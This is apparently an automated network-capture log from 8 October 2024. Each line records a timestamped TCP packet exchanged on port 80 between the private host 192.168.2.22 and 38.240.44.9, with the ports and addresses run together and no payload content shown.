                                                                                                                                                                                              Oct 8, 2024 15:37:36.560396910 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560486078 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560498953 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560513020 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560524940 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560535908 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560543060 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560548067 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560550928 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560559988 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560571909 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560581923 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560586929 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560609102 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560610056 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560647964 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560672998 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560683966 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560694933 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560710907 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560797930 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560808897 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560818911 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560828924 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560837030 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560841084 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560846090 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560878038 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560981035 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.560992956 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561002016 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561012983 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561019897 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561023951 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561036110 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561047077 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561048031 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561058044 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561070919 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.561095953 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.652870893 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.652885914 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.652896881 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.653084040 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755119085 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755139112 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755150080 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755199909 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755223989 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755235910 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755247116 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755258083 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755275965 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755291939 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755484104 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755496025 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755506992 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755517006 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755527020 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755547047 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755563974 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755580902 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755592108 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755598068 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755603075 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755609035 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755614996 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755625010 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755630970 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755637884 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755702972 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755702972 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755719900 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755729914 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755753994 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755785942 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755796909 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755806923 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755816936 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755826950 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755831957 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755842924 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755848885 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755857944 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755878925 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755920887 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755932093 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755968094 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.755992889 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756004095 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756014109 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756032944 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756158113 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756169081 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756179094 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756190062 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756201029 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756203890 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756211996 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756216049 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756223917 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756233931 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756242990 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756253004 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756269932 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756278992 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756371021 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756381989 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756392002 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756402969 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756412029 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756417990 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756422997 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756433010 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756443977 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756444931 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756469965 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756689072 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756699085 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756710052 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756720066 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756730080 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756741047 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756741047 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756741047 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756752014 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756764889 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756767988 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756774902 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756788969 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756798983 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756820917 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756833076 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756838083 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756849051 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756879091 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756907940 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756917953 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756928921 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756939888 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756957054 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.756968975 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757102966 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757114887 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757124901 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757136106 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757142067 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757153034 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757153034 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757158995 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757164001 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757173061 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757185936 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757237911 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757247925 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757260084 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757270098 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757293940 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757390976 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757402897 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757409096 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757414103 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757419109 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757424116 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757435083 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757440090 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757448912 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757458925 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757464886 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757471085 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757482052 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757483959 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757510900 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757698059 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757708073 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757719040 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757730961 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757747889 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757755995 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757760048 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757771969 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757781029 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757783890 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757792950 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757797956 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757849932 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.757998943 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758009911 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758019924 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758029938 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758040905 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758048058 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758052111 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758054972 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758064032 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758074045 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758084059 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758088112 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758095026 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758105040 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758111954 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758116007 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758127928 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.758152008 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842257977 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842329979 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842334986 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842350006 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842365980 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842379093 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842394114 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842405081 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842410088 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842426062 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842436075 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842468023 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842508078 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842510939 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842525959 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842539072 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842562914 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842597961 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842612982 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842638969 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842680931 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842721939 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842736959 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842752934 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842804909 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842822075 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842839003 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842853069 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842866898 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842881918 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842902899 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842948914 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842962980 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842979908 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842988014 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.842995882 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843017101 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843028069 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843091965 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843106031 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843120098 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843133926 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843146086 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843158007 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843170881 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843236923 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843250990 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843265057 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843283892 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843287945 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843291044 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843305111 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843318939 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843333006 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843343973 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843348980 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843368053 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843442917 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843457937 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843487978 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.843990088 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.844038010 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.844047070 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.844063997 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.844079018 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.844115973 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.844294071 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955082893 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955111980 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955126047 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955135107 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955146074 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955151081 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955159903 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955173016 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955179930 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955203056 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955224037 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955236912 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955271006 CEST4917280192.168.2.2238.240.44.9
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955437899 CEST804917238.240.44.9192.168.2.22
                                                                                                                                                                                              Oct 8, 2024 15:37:36.955454111 CEST804917238.240.44.9192.168.2.22
